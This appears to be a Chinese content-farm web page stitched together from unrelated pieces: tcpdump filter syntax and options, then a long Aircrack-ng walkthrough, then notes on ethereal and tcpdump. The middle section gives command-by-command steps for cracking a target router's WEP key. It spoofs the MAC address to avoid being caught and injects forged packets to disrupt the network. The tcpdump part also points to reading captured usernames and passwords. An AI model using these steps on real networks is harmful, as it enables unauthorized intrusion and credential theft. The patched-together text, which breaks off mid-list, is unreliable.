在Linux系統(tǒng)怎么用tcpdump命令

------------------------------------tcpdump--------------------------------

創(chuàng)新互聯(lián)主營(yíng)普蘭網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營(yíng)網(wǎng)站建設(shè)方案,成都app開(kāi)發(fā),普蘭h5小程序制作搭建,普蘭網(wǎng)站營(yíng)銷推廣歡迎普蘭等地區(qū)企業(yè)咨詢

協(xié)議報(bào)文分析器：

sniffer: 商業(yè)工具

tcpdump, wireshark(GUI), tshark(CLI)

tcpdump [options] 過(guò)濾條件

獲取報(bào)文的條件：

ip src host 172.16.100.1

tcp src or dst port 21

udp dst port 53

tcp src or dst port 21 AND src host 172.16.100.1

tcp port 21 AND host 172.16.100.1

tcpdump的語(yǔ)法：

tcpdump [options] [Protocol] [Direction] [Host(s)] [Value] [Logical Operations] [Other expression]

Protocol(協(xié)議):

Values(取值): ether, fddi, ip, arp, rarp, decnet, lat, sca, moprc, mopdl, tcp and udp.

If no protocol is specified, all the protocols are used.

Direction(流向):

Values(取值): src, dst, src and dst, src or dst

If no source or destination is specified, the "src or dst" keywords are applied. (默認(rèn)是src or dst)

For example, "host 10.2.2.2" is equivalent to "src or dst host 10.2.2.2".

Host(s)(主機(jī)):

Values(替代關(guān)鍵字): net, port, host, portrange.

If no host(s) is specified, the "host" keyword is used. 默認(rèn)如果此段沒(méi)有指定關(guān)鍵字，默認(rèn)即host。

For example, "src 10.1.1.1" is equivalent to "src host 10.1.1.1".

Logical Operations:

(1) and

and or

(2) or

or or ||

(3) except

not or !

常用選項(xiàng)：

-i any : 指定在哪個(gè)網(wǎng)卡進(jìn)行抓包

-n : 不反解主機(jī)名

-nn : 不反解主機(jī)名與端口號(hào)

-X : 以16進(jìn)制格式與ASCII格式顯示報(bào)文

-XX : 除了顯示X的內(nèi)容還顯示以太網(wǎng)首部

-v, -vv, -vvv : 顯示更詳細(xì)的信息

-c # : Only get x number of packets and then stop.

-s : Define the snaplength (size) of the capture in bytes. Use -s0 to get everything, unless you are intentionally capturing less.

-S : Print absolute sequence numbers.

-e : Get the ethernet header as well.

-q : Show less protocol information.

-E : Decrypt IPSEC traffic by providing an encryption key.

-A ：Display Captured Packets in ASCII

-w /path/to/some_file : Capture the packets and write into a file

-r /path/from/some_file : Reading the packets from a saved file

-tttt : Capture packets with proper readable timestamp

eg:

tcpdump -i eth0 -X -nn -vv tcp port 100

可以在報(bào)文上面看一下有無(wú)user與pass的信息.

tcpdump -i eth0 -X -nn -vv tcp port 110 and ip src 192.168.10.1

ip host 172.16.100.1

ip src host 172.16.100.1

ip dst host 172.16.100.1

ip src and dst host 172.16.100.1

linux怎么開(kāi)啟抓包tcp 53

Aircrack-ng系列工具也有Windows 平臺(tái)版本，但是本人的小黑的始終不能在win下抓包，所以只能 棄 Windows 從Linux 了，另外 Windows 下掃描到的 AP 也比 Linux 下少了很多。其實(shí) Windows 并不完整的支持 TCP/IP 協(xié)議族，有些協(xié)議Windows 直接丟棄不用。網(wǎng)絡(luò)本來(lái)從一開(kāi)始就是 Unix 的天下，Windows 只是在后來(lái)加入了網(wǎng)絡(luò)的功能。 Aircrack-ng工具包有很多工具，我用到的工具主要有以下幾個(gè)： airmon-ng 處理網(wǎng)卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 發(fā)包，干擾 另外還要用到以下 linux 命令: ifconfig 查看修改網(wǎng)卡狀態(tài)和參數(shù) macchanger 偽造 MAC iwconfig 主要針對(duì)無(wú)線網(wǎng)卡的工具 (同 ifconfig) iwlist 獲取無(wú)線網(wǎng)絡(luò)的更詳細(xì)信息 另外還有其他的 linux 基本命令，我就不提示了。 具體破解步驟： 1. 修改無(wú)線網(wǎng)卡狀態(tài)：先 dow 2. 偽造無(wú)線網(wǎng)卡的 MAC 地址：安全起見(jiàn)，減少被抓到的可能 3. 修改網(wǎng)卡工作模式：進(jìn)入Monitor狀態(tài)，會(huì)產(chǎn)生一個(gè)虛擬的網(wǎng)卡 4. 修改無(wú)線網(wǎng)卡狀態(tài)： up 5. 查看網(wǎng)絡(luò)狀態(tài)，記錄下 AP 的 MAC 和本機(jī)的 MAC ，確定攻擊目標(biāo) 6. 監(jiān)聽(tīng)抓包：生成 .cap 或 .ivs 7. 干擾無(wú)線網(wǎng)絡(luò)：截取無(wú)線數(shù)據(jù)包，發(fā)送垃圾數(shù)據(jù)包，用來(lái)獲得更多的有效數(shù)據(jù)包 8. 破解 .cap 或 .ivs ，獲得 WEP 密碼，完成破解Crack Mode一共有5種請(qǐng)酌情使用還有網(wǎng)卡不一定是ath1也有可能是wifi0，ath0等等 ifconfig -a ifconfig -a ath0 up airmon-ng start wifi0 6 airodump-ng --ivs -w 目標(biāo)路由器IVS文件 -c 6 ath1 airodump-ng ath1 aireplay-ng -1 0 -e 目標(biāo)路由器SSID -a 目標(biāo)MAC -h 本機(jī)MAC ath1 ----------- -2 Crack Mode----------- aireplay-ng -2 -p 0841 -c ffffffffffff -b 目標(biāo)MAC -h 本機(jī)MAC ath1 ----------- -3 Crack Mode----------- aireplay-ng -3 -b 目標(biāo)MAC -h 本機(jī)MAC ath1 ----------- -4 Crack Mode----------- aireplay-ng -4 -b 目標(biāo)MAC -h 本機(jī)MAC ath1 packetforge-ng -0 -a 目標(biāo)MAC -h 本機(jī)MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 ----------- -5 Crack Mode----------- aireplay-ng -5 -b 目標(biāo)MAC -h 本機(jī)MAC ath1 packetforge-ng -0 -a 目標(biāo)MAC -h 本機(jī)MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 -----------Crack Key----------- aircrack-ng -n 64 -b 目標(biāo)MAC 目標(biāo)路由器IVS文件-01.ivs —————————————————————————————— 　下面詳細(xì)介紹一下各個(gè)命令的基本用法（參照命令的英文說(shuō)明） 1. ifconfig 用來(lái)配置網(wǎng)卡，我們這里主要用來(lái) 禁用和啟用 網(wǎng)卡： ifconfig ath0 down ifconfig ath0 up 禁用一下網(wǎng)卡的目的是為了下一步修改 MAC 。 2.macchanger 用來(lái)改變網(wǎng)卡的 MAC 地址，具體用法如下： usage: macchanger [options] device -h 顯示幫助 -V 顯示版本 -s 顯示當(dāng)前MAC -e 不改變mac,使用硬件廠商寫(xiě)入的MAC -a 自動(dòng)生成一個(gè)同類型的MAC，同廠商的 -A 自動(dòng)生成一個(gè)不同類型的MAC，不同廠商的 -r 生成任意MAC -l 顯示已知廠商的網(wǎng)卡MAC地址分配，這個(gè)很有用，可以根據(jù)MAC查出來(lái)是哪個(gè)廠商生產(chǎn)的產(chǎn)品 -m 設(shè)置一個(gè)自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 啟動(dòng)無(wú)線網(wǎng)卡進(jìn)入 Monitor 模式， useage: airmon-ng startstopcheck interface [channel] startstopcheck啟動(dòng)，停止，檢測(cè) interface指定無(wú)線網(wǎng)卡 [channel] 監(jiān)聽(tīng)頻道，現(xiàn)代大多數(shù)無(wú)線路由默認(rèn)是 6，隨便掃描一下都是這個(gè)頻道，網(wǎng)管們應(yīng)該換換了 4.iwconfig 專用的無(wú)線網(wǎng)卡配置工具，用來(lái)配置特殊的網(wǎng)絡(luò)信息，不帶參數(shù)時(shí)顯示可用網(wǎng)絡(luò)。 useage：iwconfig interface [options] [essid{NNONOFF}] 指定essid號(hào) 開(kāi)啟關(guān)閉 [nwid{NNonoff}] 指定網(wǎng)絡(luò)id號(hào) 開(kāi)啟關(guān)閉 [mode {managedad-hoc....}] 指定無(wú)線網(wǎng)絡(luò)工作模式/類型 [freq N.NNNN[KMG]] 指定工作頻率 [channel N] 指定頻道 [ap {Noffauto}] 指定AP號(hào) 關(guān)閉/自動(dòng) [sens N] sens 號(hào) [nick N] nick 號(hào) [rate {Nautofixed}] 速率控制 [rts {Nautofixedoff}] rts控制，如果不知道什么是RTS，那就回去好好去學(xué)網(wǎng)絡(luò)，不用往下看了 [frag {Nautofixedoff}] 碎片控制 [enc {NNNN-NNNNoff}] 范圍 [power {period Ntimeout N}] 電源 頻率/超時(shí) [retry {limit Nlifetime N}] 重試 限次/超時(shí) [txpower N{mwdBm}] 功率 毫瓦/分貝 [commit] 處理 5.iwlist 主要用來(lái)顯示無(wú)線網(wǎng)卡的一些附加信息,同上 useage: iwlist [interface] options scanning 掃描 frequency 頻率 channel 頻道 bitrate 速率 rate 速率 encryption 加密 key 密鑰 power 電源 txpower 功率 ap ap accespoints ap peers 直連 event 事件 6.airodump-ng 抓包工具,我最喜歡用的,詳細(xì)用法如下: usage: airodump-ng options interface[,interface,...] Options: --ivs :僅將抓取信息保存為 .ivs --gpsd :使用 GPSd --write prefix :保存為指定日文件名,我一般用這個(gè),尤其是多個(gè)網(wǎng)絡(luò)時(shí),指定了也好區(qū)分 -w :同 --write --beacons :保存所有的 beacons ,默認(rèn)情況況下是丟棄那些無(wú)用的數(shù)據(jù)包的 --update secs :顯示更新延遲,沒(méi)有用過(guò) --showack :顯示ack/cts/rts狀態(tài),還是那句,不知道rts就不用看了 -h :隱藏已知的,配合上面的選項(xiàng)使用 -f msecs :跳頻時(shí)間 --berlin secs :無(wú)數(shù)據(jù)包接收時(shí)延遲顯示的時(shí)間,這句不太好翻譯,意思是當(dāng)那個(gè)信號(hào)發(fā)出設(shè)備沒(méi)有發(fā)出數(shù)據(jù)包多少時(shí)間之后,就停止對(duì)它的監(jiān)視.默認(rèn)120秒.建議學(xué)好英文去讀原文,翻譯的都會(huì)有出入,這是我的理解.(mhy_mhy注) -r file :從指定的文件讀取數(shù)據(jù)包.我也想有人給我抓好包放哪里,呵呵 Filter options: --encrypt suite : 使用密碼序列過(guò)濾 AP --netmask netmask : 使用掩碼過(guò)濾 AP --bssid bssid : 使用 bssid 過(guò)濾 AP -a : 過(guò)濾無(wú)關(guān)的客戶端 默認(rèn)情況下使用2.4Ghz,你也可以指定其他的頻率,通過(guò)以下命令操作: --channel channels:指定頻道 --band abg :制定帶寬 -C frequencies :指定頻率MHz --cswitch method : 設(shè)置頻道交換方式 0 : FIFO (default) 先進(jìn)先出(默認(rèn)) 1 : Round Robin 循環(huán) 2 : Hop on last 最后一跳 -s : 同上 --help : 顯示使用方法,翻譯到這里,感覺(jué)還是英文的貼切一點(diǎn),建議讀原文 7.aireplay-ng

linux系統(tǒng)下如何查看數(shù)據(jù)包

linux上有兩種比較好的抓包工具：ethereal和tcpdump

對(duì)于ethereal，有圖形界面和字符界面兩種方式。

到linux系統(tǒng)上執(zhí)行rpm -qa | grep ethereal-gnome可查看是否安裝了圖形版本

但是如果服務(wù)器上沒(méi)有xwin圖形環(huán)境，那么就只能用字符界面了

命令：tethereal

可選參數(shù)：-V、-f

如果只執(zhí)行tethereal，那么將只抓取數(shù)據(jù)包的包頭，不顯示里邊的內(nèi)容。加上-V參數(shù)后，即可顯示內(nèi)容。

-f 參數(shù)用于過(guò)濾，默認(rèn)情況下將抓取tcp和udp所有協(xié)議。

如果想抓取UDP數(shù)據(jù)包并顯示內(nèi)容，則執(zhí)行tethereal -V -f udp 即可

另外還可以配合grep命令提取需要的關(guān)鍵內(nèi)容

tcudump命令是另外一個(gè)有用的工具，只能在字符下使用，

tcpdump -n -nn -vv -XX -tttt -c 10 -e

參數(shù)：

-n：數(shù)字端口

-nn：數(shù)字地址

-vv：輸出詳細(xì)信息

-c：抓取包的數(shù)量

-e：打印以太網(wǎng)報(bào)頭信息

-i：選擇適配器